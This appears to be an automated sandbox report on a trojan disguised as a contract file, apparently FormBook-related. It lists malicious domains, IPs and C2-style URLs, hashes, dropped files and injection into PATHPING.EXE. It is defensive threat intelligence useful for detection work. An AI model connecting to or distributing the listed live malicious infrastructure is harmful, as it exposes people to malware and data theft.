                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.ecosia.org/newtab/PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://www.cmdh1c.xyzRprkEKYwQARXc.exe, 00000008.00000002.4137334870.0000000005304000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.carterandcone.comldraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://ac.ecosia.org/autocomplete?q=PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNdraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9PATHPING.EXE, 00000007.00000002.4136306334.0000000004348000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.0000000003548000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.founder.com.cn/cndraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.fontbureau.com/designers/frere-user.htmldraft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.jiyu-kobo.co.jp/draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.fontbureau.com/designers8draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/PATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      163.44.176.12
                                                                                                                      		www.broork.sbsJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                      172.67.131.32
                                                                                                                      		www.7wkto5nk230724z.clickUnited States
                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                      38.47.232.160
                                                                                                                      		44kdd.topUnited States
                                                                                                                      		174COGENT-174UStrue
                                                                                                                      195.110.124.133
                                                                                                                      		nutrigenfit.onlineItaly
                                                                                                                      		39729REGISTER-ASITtrue
                                                                                                                      103.191.208.137
                                                                                                                      		roopiedutech.onlineunknown
                                                                                                                      		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                      162.0.211.143
                                                                                                                      		www.zoptra.infoCanada
                                                                                                                      		35893ACPCAtrue
                                                                                                                      185.68.16.94
                                                                                                                      		www.redex.funUkraine
                                                                                                                      		200000UKRAINE-ASUAtrue
                                                                                                                      199.59.243.227
                                                                                                                      		www.deepfy.xyzUnited States
                                                                                                                      		395082BODIS-NJUStrue
                                                                                                                      103.233.82.58
                                                                                                                      		official.roamimg.strawberrycdn.comThailand
                                                                                                                      		45652VPLSVPLSASIATHtrue
                                                                                                                      34.92.109.131
                                                                                                                      		www.dbasky.netUnited States
                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                      3.33.130.190
                                                                                                                      		bocadolobopetra.netUnited States
                                                                                                                      		8987AMAZONEXPANSIONGBtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1546621
                                                                                                                      Start date and time:2024-11-01 09:16:05 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 10m 22s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:draft contract for order #782334.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@15/11
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 75%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 96%
                                                                                                                      • Number of executed functions: 131
                                                                                                                      • Number of non-executed functions: 271
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target RprkEKYwQARXc.exe, PID 4444 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • VT rate limit hit for: draft contract for order #782334.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      04:17:00API Interceptor1x Sleep call for process: draft contract for order #782334.exe modified
                                                                                                                      04:18:13API Interceptor8880922x Sleep call for process: PATHPING.EXE modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      163.44.176.12INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.broork.sbs/mivl/
                                                                                                                      38.47.232.160DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.59vdd.top/2aw9/
                                                                                                                      195.110.124.133HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nutrigenfit.online/2vhi/
                                                                                                                      Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.nidedabeille.net/qkk1/
                                                                                                                      INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nutrigenfit.online/uye5/
                                                                                                                      rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nutrigenfit.online/938r/
                                                                                                                      OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nutrigenfit.online/2vhi/
                                                                                                                      rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.elettrosistemista.zip/fo8o/
                                                                                                                      Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • www.nidedabeille.net/kp5a/
                                                                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • www.nutrigenfit.online/8gyb/
                                                                                                                      TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.nidedabeille.net/oy0l/
                                                                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.hentaistgma.net/qhr1/
                                                                                                                      103.191.208.137NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.roopiedutech.online/f01d/
                                                                                                                      162.0.211.143rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.crysta.xyz/hz8f/
                                                                                                                      LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • www.nexari.xyz/5b3f/

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      www.7wkto5nk230724z.clickLlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.3.193
                                                                                                                      www.redex.funrequest-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • 185.68.16.94
                                                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.68.16.94
                                                                                                                      www.deepfy.xyz19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 199.59.243.227
                                                                                                                      www.broork.sbsINVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 163.44.176.12

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      REGISTER-ASITHT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 81.88.48.71
                                                                                                                      Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.110.124.133
                                                                                                                      INTERQGMOInternetIncJPhttp://3d1.gmobb.jp/dcm299ccyag4e/gov/Get hashmaliciousPhisherBrowse
                                                                                                                      • 133.130.64.224
                                                                                                                      INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 163.44.176.12
                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 118.27.39.62
                                                                                                                      splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 133.130.30.78
                                                                                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 150.95.219.226
                                                                                                                      nklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 157.7.100.28
                                                                                                                      la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 160.251.222.180
                                                                                                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                      • 118.27.125.181
                                                                                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 133.130.35.90
                                                                                                                      w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 133.130.35.90
                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      V323904LY3.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.22.75.171
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 104.26.9.242
                                                                                                                      SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 162.159.135.233
                                                                                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                      • 104.26.9.242
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      COGENT-174USVkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 154.7.176.67
                                                                                                                      NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 38.88.82.56
                                                                                                                      71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                                                      • 45.93.20.135
                                                                                                                      71Ah2iqq3g.dllGet hashmaliciousAmadeyBrowse
                                                                                                                      • 45.93.20.135
                                                                                                                      1nnlXctdko.dllGet hashmaliciousAmadeyBrowse
                                                                                                                      • 45.93.20.135
                                                                                                                      HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 154.23.181.7
                                                                                                                      18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 38.88.82.56
                                                                                                                      WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 38.88.82.56
                                                                                                                      bszYGSIHuU.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 38.180.123.95
                                                                                                                      819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • 143.244.56.49
                                                                                                                      AARNET-AS-APAustralianAcademicandResearchNetworkAARNeNF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 103.191.208.137
                                                                                                                      wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 138.46.90.143
                                                                                                                      8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 103.169.166.17
                                                                                                                      belks.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 103.14.48.181
                                                                                                                      jew.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 103.166.98.131
                                                                                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 103.175.202.32
                                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 103.180.66.82
                                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 129.96.157.118
                                                                                                                      SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeGet hashmaliciousRemcosBrowse
                                                                                                                      • 103.186.117.77
                                                                                                                      https://startuppro.wethemez.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVVXdzRVWEk9JnVpZD1VU0VSMjExMDIwMjRVNTIxMDIxNTI=N0123Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                      • 103.187.22.30

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\draft contract for order #782334.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:true
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                      C:\Users\user\AppData\Local\Temp\6276I39

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.956241236145516
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      File name:draft contract for order #782334.exe
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5:dab7306baf4c0e52d2357f48b7a12911
                                                                                                                      SHA1:52c04bd5512ba50072c4169bd6bf54af7b3557ee
                                                                                                                      SHA256:c55ad029c3701a693dd7bebefc90a13766f75972819faacc93fd1b57039f26b6
                                                                                                                      SHA512:609334705b4f3f4b23b98bbe1d11717ac8781d53f3a997ac4ea403b9c060d456e67691dacd92fc816ad1cea5ae6aff62ebe3c969806505ebcc3d018c4c50b952
                                                                                                                      SSDEEP:12288:lxaDPw1Qk89TmyN9PEeXMYTpoOcEPKtslLrY/dLpE/eGy9A97tMQmLqeE4E:loLw9gTFNNz8YdoOcEPKilLrY/pEy9bx
                                                                                                                      TLSH:9EF4224073A85F11D97A67BEA7E010CC57F47952AE66F3AC1ED6A0CE2AA37010B74D07
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0..j............... ........@.. ....................................@................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4b88f6
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x6721D91B [Wed Oct 30 06:58:35 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb88a20x4f.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x624.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb61240x54.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x20000xb68fc0xb6a00f878d026b15d5d42fb8097f4a7a10219False0.9624494674024641data7.963186264062305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xba0000x6240x800b3329aa18924ab1f220f2a87c5fd8a25False0.33642578125data3.4494780425708464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
